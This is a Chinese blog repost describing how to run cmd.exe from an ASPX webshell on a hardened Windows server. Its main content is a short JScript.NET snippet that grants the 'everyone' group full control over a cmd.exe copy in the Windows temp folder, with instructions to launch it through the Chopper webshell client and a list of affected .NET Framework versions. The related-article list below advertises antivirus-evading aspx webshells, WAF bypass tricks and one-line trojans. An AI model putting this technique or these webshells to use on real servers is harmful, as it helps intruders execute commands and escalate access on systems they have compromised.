aspxshell下突破无可写可执行目录执行cmd

最新推荐文章于 2021-02-06 13:30:53 发布
最新推荐文章于 2021-02-06 13:30:53 发布
阅读量140 收藏
点赞数
原文链接:http://www.cnblogs.com/hookjoy/p/4614337.html
版权 
try
{

var strPath:String = "c:\\windows\\temp\\cmd.exe", strUser:String = "everyone";
var dirinfo:System.IO.DirectoryInfo = new System.IO.DirectoryInfo(strPath);

var dirsecurity:System.Security.AccessControl.DirectorySecurity = dirinfo.GetAccessControl();

dirsecurity.AddAccessRule(new System.Security.AccessControl.FileSystemAccessRule(strUser,
    System.Security.AccessControl.FileSystemRights.FullControl,
    System.Security.AccessControl.AccessControlType.Allow));

dirinfo.SetAccessControl(dirsecurity);
Response.Write(strPath+"\t权限添加成功!");

}catch(x){Response.Write(x.Message);}

  保存为cmd.ccc,使用菜刀自写脚本运行即可突破

受影响的版本为:

Microsoft .NET Framework 2.0 

Microsoft .NET Framework 3.5

Microsoft .NET Framework 3.5.1

Microsoft .NET Framework 4

Microsoft .NET Framework 4.5

Microsoft .NET Framework 4.5.1

 

利用条件:

1.需要支持aspx并且高于Microsoft .NET Framework 1.14版本

2.安全模式除外(现在还没有能突破.net安全模式的方法)

漏洞说明:该漏洞可直接赋予文件权限(让没权限的文件执行)

转载于:https://www.cnblogs.com/hookjoy/p/4614337.html

weixin_34112208
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
aspx脚本cmd小命令
01-06
ASP.Net执行cmd命令的实现代码,需要的朋友可以参考下:using System; using System.Collections; using System.Configuration; using System.Data; using System.Linq; using System.Web; using System.Web.Security; using System.Web.UI; using System.Web.UI.HtmlControls; using System.Web.UI.WebControl
aspx页面通过代码调用cmd来运行注册服务
weixin_34406086的博客
10-15 424
之前不是了windows服务吗,需要向系统注册服务,但是我只有ftp权限怎么办,不能远程到桌面。   想了个办法,了一个aspx页面,通过代码调用cmd来运行。当然,因为服务器安全放的比较开,内网吗~   下面代码 <%@PageLanguage="C#"AutoEventWireup="true"CodeFile="CMD.aspx....
aspxspy mysql_Aspxspy中提取执行cmd命令的代码
weixin_36035466的博客
02-06 137
protectedvoidFbhN(objectsender,EventArgse){try{ProcessahAE=newProcess();ahAE.StartInfo.FileName=kusi.Value;ahAE.StartInfo.Arguments=bkcm.Value;ahAE.StartInfo.UseShellExecute=false;ahAE.StartInfo...
shell.aspx
05-06
真的过安全狗,过D盾,提权还是得看脸,亲测可用,本程序只允许内部测试使用,请勿用作违法用途。请遵守国家法律法规,勿要以身试法。
asp.net执行cmd命令
gzeehg007的博客
06-13 3114
IIS中执行时,可能会有权限问题,应用程序池》高级设置》进程模型》标识  设置用户名和密码 protected void Button1_Click(object sender, EventArgs e)     {         Response.Write(ExeCommand("d:\\qt-faststart.exe d:\\11.mp4 d:\\88.mp4")); 
c# winform调用cmd命令+bat脚本执行
最新发布
12-30
调用 cmd(Command Prompt)是一种常见的操作系统间的交互方式...(3)灵活性和可扩展性:cmd 提供了丰富的命令和选项,可以满足各种操作需求。而且可以通过批处理脚本复杂的操作流程,提高代码的可读性和可维护性
java执行windows下cmd命令的方法
09-04
主要介绍了java执行windows下cmd命令的方法,较为详细的说明了Java执行Windows下CMD命令的方法,并总结了常用的CMD命令供大家参考,需要的朋友可以参考下
LINUX 下实现一个可执行命令工具
08-19
在Linux操作系统中,开发一个可执行命令工具是提高效率和自动化任务的重要手段。这个特定的命令工具,我们将其称为"cmd",具有三个不同的选项,分别用于列出目录内容、启动文本编辑器以及执行关机操作。下面将详细...
执行文件资源提取
01-08
对可执行文件进行资源提取...使用方法:打开cmd,敲入:"资源提取.exe xxx.exe ./",其中"资源提取.exe"为软件名,"xxx.exe"为需要提取的可执行文件,最后面的"./"为输出路径。自己编的程序,可能有些bug,欢迎留言。
Java执行cmd命令两种实现方法解析
08-18
Java执行cmd命令两种实现方法解析 Java执行cmd命令两种实现方法解析是Java开发中非常常见的一种需求,通过执行cmd命令,可以实现系统级别的操作。本文将详细介绍Java执行cmd命令两种实现方法,并通过示例代码进行...
aspx 版webshell
01-16
此文件是一个是一个别人的webshll,开发环境c#
aspxwebshell免杀过杀软亲自制作
10-29
亲自制作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能,附源码生成命令copy f.jpg/b +x.aspx/a hez.jpg
精品整理 asp,aspx后门(webshell)10个
12-15
精品收集整理各种websheel,没有后门,没有重复,是站长管理网站,清除木马的好助手
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
ASPX一句话shell客户端+ASPXshell MS08-067插件
12-28
ASPX一句话shell客户端+ASPXshell MS08-067插件
shell 免杀aspx_发个免杀修改的aspx提权马
weixin_35559202的博客
12-31 401
htmlPUBLIC"-//W3C//DTDXHTML1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">protectedvoidPage_load(objectsender,EventArgse){stringok=Request.QueryString["s...
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 626
一句话木马在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。最常见的php一句话木马这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改一句话木马绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
shell 免杀aspx_绕过WebShell检测的总结之文件免杀
weixin_31124869的博客
12-31 557
WAF会维护一个规则库记录webshell常用的函数、方法、结构,当匹配上对应特征时便发出警告、直接封禁或隔离。但是安全厂商们为了提升用户体验,一般会以可用性为首要目标,其次才是安全性,这是一个硬伤也是绕过的基础由于正常业务功能的需要,WAF通常并不会全盘枪毙语言中可以执行代码的结构或函数(比如eval),而是判断敏感函数是否处于某种木马后门常用且业务功能不常用的结构中,绕过即是找出既能达到目的又...
shell 免杀aspx_记一次aspx网站渗透
weixin_42128141的博客
12-29 1566
通过前期信息搜集获取到目标站的80xx端口发现一处源码泄露查看配置文件登录manage.aspx上传shell发现安装了TeamViewer看下进程如果运行tv的话,可直接读取其远程的账号密码https://github.com/uknowsec/SharpDecryptPwdSharpDecryptPwd对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,T...
cmd 中打开可执行文件
06-01
在 Windows 操作系统中,可以使用以下步骤在 cmd 中打开可执行文件: 1. 打开 cmd 命令行窗口:在 Windows 操作系统中,可以按下 Win + R 组合键,然后输入 "cmd" 并按下回车键。 2. 切换到可执行文件所在的目录:使用 cd 命令切换到可执行文件所在的目录,例如:cd C:\Program Files\MyExecutable。 3. 输入可执行文件的名称并按下回车键:输入可执行文件的名称(包括后缀名)并按下回车键,例如:MyExecutable.exe。 这样就可以在 cmd 中打开可执行文件了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值